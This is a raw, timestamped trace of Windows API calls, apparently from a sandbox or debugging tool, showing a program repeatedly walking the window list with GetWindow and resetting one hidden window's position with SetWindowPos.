[0057.537] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.537] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.537] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.537] 
GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.537] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.537] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.537] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.537] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.537] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.537] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.537] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.537] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.537] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.537] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.537] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.537] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.537] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.537] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.537] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.537] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.537] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.537] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.537] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.537] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.537] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.537] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.537] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.537] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.538] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.538] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.538] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.538] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.538] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.538] GetWindow 
(hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.538] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.538] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.538] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.538] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.538] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.538] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.538] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.538] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.538] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.538] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.538] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.538] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.538] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.538] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.538] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.538] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.538] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.538] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.539] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.539] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.539] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.539] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.539] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.539] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.539] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.539] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.539] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.539] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.539] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.539] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.539] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 
[0057.539] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.539] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.539] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.539] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.539] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.539] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.539] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.539] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.539] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.539] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.539] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.539] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.540] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.540] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.540] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.540] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.540] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.540] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.540] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.540] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.540] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.540] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.540] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.540] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.540] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.540] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.540] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.540] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.540] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.540] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.540] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.540] GetWindow (hWnd=0x20020, uCmd=0x2) 
returned 0x2001c [0057.540] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.540] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.540] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.540] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.541] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.541] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.541] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.541] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.541] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.541] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.541] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.541] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.541] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.541] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.541] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.541] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.541] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.541] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.541] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.541] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.541] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.541] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.541] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.541] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.541] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.541] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.541] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.541] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.541] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.542] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.542] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.542] GetWindow 
(hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.542] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.542] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.542] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.542] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.542] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.542] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.542] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.542] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.542] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.542] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.542] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.542] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.542] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.542] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.542] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.542] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.542] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.542] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.542] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.542] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.542] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.542] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.542] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.543] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.543] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.543] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.543] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.543] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.543] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.543] IsWindowVisible 
(hWnd=0x601a8) returned 0 [0057.543] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.543] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.543] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.543] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.543] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.543] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.543] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.543] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.543] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.543] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.543] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.543] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.543] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.543] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.543] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.543] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.543] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.543] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.543] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.543] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.543] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.543] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.543] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.543] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.544] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.544] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.544] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.544] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.544] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.544] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.544] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.544] GetWindow 
(hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.544] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.544] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.544] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.544] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.544] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.544] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.544] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.544] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.544] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.544] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.544] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.544] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.544] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.544] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.544] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.544] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.544] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.544] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.544] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.544] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.544] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.544] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.544] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.545] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.545] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.545] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.545] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.545] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.545] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.545] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.545] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a 
[0057.545] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.545] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.545] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.545] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.545] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.545] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.545] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.545] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.545] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.545] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.545] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.545] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.545] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.545] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.545] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.545] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.545] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.545] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.545] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.545] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.545] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.545] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.545] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.545] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.546] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.546] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.546] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.546] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.546] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.546] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.546] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.546] GetWindow (hWnd=0x10030, uCmd=0x2) 
returned 0x2002c [0057.546] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.546] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.546] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.546] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.546] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.546] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.546] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.546] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.546] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.546] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.546] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.546] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.546] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.546] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.546] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.546] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.546] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.546] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.546] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.547] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.547] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.547] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.547] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.547] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.547] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.547] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.547] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.547] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.547] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.547] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 
0x100d2 [0057.547] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.547] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.547] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.547] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.547] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.547] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.547] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.547] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.547] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.547] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.547] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.547] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.547] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.547] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.547] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.547] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.547] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.547] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.548] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.548] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.548] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.548] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.548] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.548] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.548] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.548] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.548] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.548] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.548] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.548] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.548] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.548] GetWindow (hWnd=0x10174, uCmd=0x2) 
returned 0x10176 [0057.548] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.548] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.548] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.548] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.548] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.548] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.548] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.548] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.548] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.548] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.549] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.549] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.549] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.549] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.549] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.549] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.549] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.549] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.549] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.549] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.549] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.549] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.549] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.549] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.549] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.549] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.549] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.549] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.549] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.549] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.549] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.549] GetWindow 
(hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.549] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.549] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.549] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.550] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.550] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.550] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.550] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.550] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.550] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.550] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.550] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.550] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.550] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.550] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.550] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.550] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.550] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.550] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.550] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.550] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.550] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.550] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.550] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.550] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.550] GetWindow 